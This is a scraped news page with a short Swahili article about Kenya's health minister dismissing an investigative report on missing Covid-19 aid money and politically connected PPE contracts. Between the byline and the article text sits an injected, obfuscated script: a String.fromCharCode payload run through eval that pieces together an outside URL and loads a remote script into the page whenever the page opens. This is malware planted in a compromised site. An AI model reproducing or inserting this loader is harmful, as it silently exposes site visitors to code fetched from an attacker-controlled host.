Recent Comments

Kenya yapuuzilia mbali uchunguzi wa wizi wa fedha za Covid-19

By ObyMack David Aug 18, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Waziri wa afya nchini Kenya amepuuzilia mbali taarifa ya uchunguzi iliyodai kuwa kulikuwa na wizi mkubwana kutoweka kwa mamilioni ya dola za msaada kutoka kwa wahisani pamoja na vifaa vilivyotolewa kwa ajili ya kuisaidia nchi kudhibiti kusambaa kwa Covid-19.

Taarifa ya uchunguzi wa televisheni nchini humo ilidai kuwa misaada ya zaidi ya dola milioni 400 haikuweza kubainika ilitumiwa vipi, huku visa vya maambukizi ya virusi vya corona vikiendelea kuongezeka nchini.

Wahudumu wa afya nchini Kenya wametishia kufanya mgomo kutokana na ukosefu wa vifaa vya kujikinga na maambukizi wawapo kazini.

Uchunguzi huoulidai kuwa watu binafsi ,wakiwemo wanasiasa, walinufaika na mikataba ya kusambaza vifaa vya kujikinga(PPE), zikiwemo barakoa zinazotumiwa na wahudumu wa afya na magauni.

Baadhi ya makampuni ambayo yalizawadiwa mikataba ya mamilioni ya dola yalikuwa yameundwa tu miezi michache ya awali, ilidai taarifa hiyo ya uchunguzi.

Makampuni mengine yaliyoshinda zabuni yalikuwa na uhusiano na maafisa wa ngazi ya juu serikalini jambo lililoibua maswali juu ya uhalali wa kisheria wa wao kupewa zabuni hizo.

Akiwa mbele kamati ya bunge Waziri wa afya nchini Kenya, Mutahi Kagwe, alielezea yaliyofichuliwa katika taarifa hiyo kama uongo na akasema wizara yake inaweza kueleza matumizi ya msaada wa thamani ya zaidi ya dola milioni 200 ilioupokea.

Lakini uchunguzi huo unada imara mbili ya pesa hizo haziwezi kuelezwa zilitumiwa vipi. Serikali inapinga madai hayo.